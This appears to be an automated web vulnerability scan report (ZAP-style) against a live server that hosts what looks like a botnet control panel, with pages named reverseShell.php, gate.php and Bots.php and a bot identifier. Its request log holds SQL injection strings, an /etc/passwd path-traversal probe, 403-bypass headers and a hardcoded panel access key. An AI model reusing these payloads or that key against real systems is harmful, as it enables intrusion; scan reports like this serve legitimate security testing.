| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="GET"> |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="GET"> |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form method="POST"> |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 85 bytes. | |
| Response Header - size: 256 bytes. | |
| Response Body - size: 3,651 bytes. | |
| Instances | 7 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html https://cwe.mitre.org/data/definitions/352.html |
| Tags | OWASP_2021_A01 WSTG-v42-SESS-05 OWASP_2017_A05 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 10202 |
| Medium | Anti-CSRF Tokens Check |
|---|---|
| Description |
A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.
CSRF attacks are effective in a number of situations, including:
* The victim has an active session on the target site.
* The victim is authenticated via HTTP auth on the target site.
* The victim is on the same local network as the target site.
CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 603 bytes. | |
| Request Body - size: 57 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 3 |
| Solution |
Phase: Architecture and Design
Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
For example, use anti-CSRF packages such as the OWASP CSRFGuard.
Phase: Implementation
Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.
Phase: Architecture and Design
Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).
Note that this can be bypassed using XSS.
Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.
Note that this can be bypassed using XSS.
Use the ESAPI Session Management control.
This control includes a component for CSRF.
Do not use the GET method for any request that triggers a state change.
Phase: Implementation
Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html https://cwe.mitre.org/data/definitions/352.html |
| Tags | OWASP_2021_A05 WSTG-v42-SESS-05 OWASP_2017_A06 |
| CWE Id | 352 |
| WASC Id | 9 |
| Plugin Id | 20012 |
| Medium | Application Error Disclosure |
|---|---|
| Description | This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <b>Warning</b>: Undefined array key "id" in <b>C:\xampp\htdocs\TQUIA729JAULAMJS\tasks_page.php</b> on line <b>20</b><br /> |
| Request Header - size: 459 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 389 bytes. | |
| Response Body - size: 131 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Parent Directory |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| Instances | 10 |
| Solution | Review the source code of this page. Implement custom error pages. Consider implementing a mechanism to provide a unique error reference/identifier to the client (browser) while logging the details on the server side and not exposing them to the user. |
| Reference | |
| Tags | WSTG-v42-ERRH-02 WSTG-v42-ERRH-01 OWASP_2021_A05 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 13 |
| Plugin Id | 90022 |
| Medium | Bypassing 403 |
|---|---|
| Description | Bypassing 403 endpoints may be possible: the scan rule sent a payload that caused the response to be accessible (status code 200). |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | x-original-url: /TQUIA729JAULAMJS |
| Evidence | |
| Request Header - size: 184 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | x-original-url: /TQUIA729JAULAMJS/Sound%20Effects |
| Evidence | |
| Request Header - size: 200 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| Instances | 2 |
| Solution | |
| Reference | https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/ https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf https://www.contextis.com/en/blog/server-technologies-reverse-proxy-bypass |
| Tags | OWASP_2021_A01 WSTG-v42-ATHN-04 OWASP_2017_A05 |
| CWE Id | |
| WASC Id | |
| Plugin Id | 40038 |
| Medium | Content Security Policy (CSP) Header Not Set |
|---|---|
| Description | Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files. |
| URL | http://142.202.242.172 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 148 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 149 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 159 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 160 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 165 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 626 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 241 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 566 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 290 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 304 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 459 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 709 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 468 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20- |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 766 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs= |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 972 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 247 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 603 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 197 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 533 bytes. | |
| Request Body - size: 33 bytes. | |
| Response Header - size: 197 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 479 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 647 bytes. | |
| Request Body - size: 69 bytes. | |
| Response Header - size: 363 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 50 |
| Solution | Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header. |
| Reference | https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html https://www.w3.org/TR/CSP/ https://w3c.github.io/webappsec-csp/ https://web.dev/articles/csp https://caniuse.com/#feat=contentsecuritypolicy https://content-security-policy.com/ |
| Tags | OWASP_2021_A05 OWASP_2017_A06 |
| CWE Id | 693 |
| WASC Id | 15 |
| Plugin Id | 10038 |
| Medium | Directory Browsing |
|---|---|
| Description | It is possible to view a listing of the directory contents. Directory listings may reveal hidden scripts, include files, backup source files, etc., which can be accessed to reveal sensitive information. |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | http://142.202.242.172/xampp/ |
| Evidence | Parent Directory |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
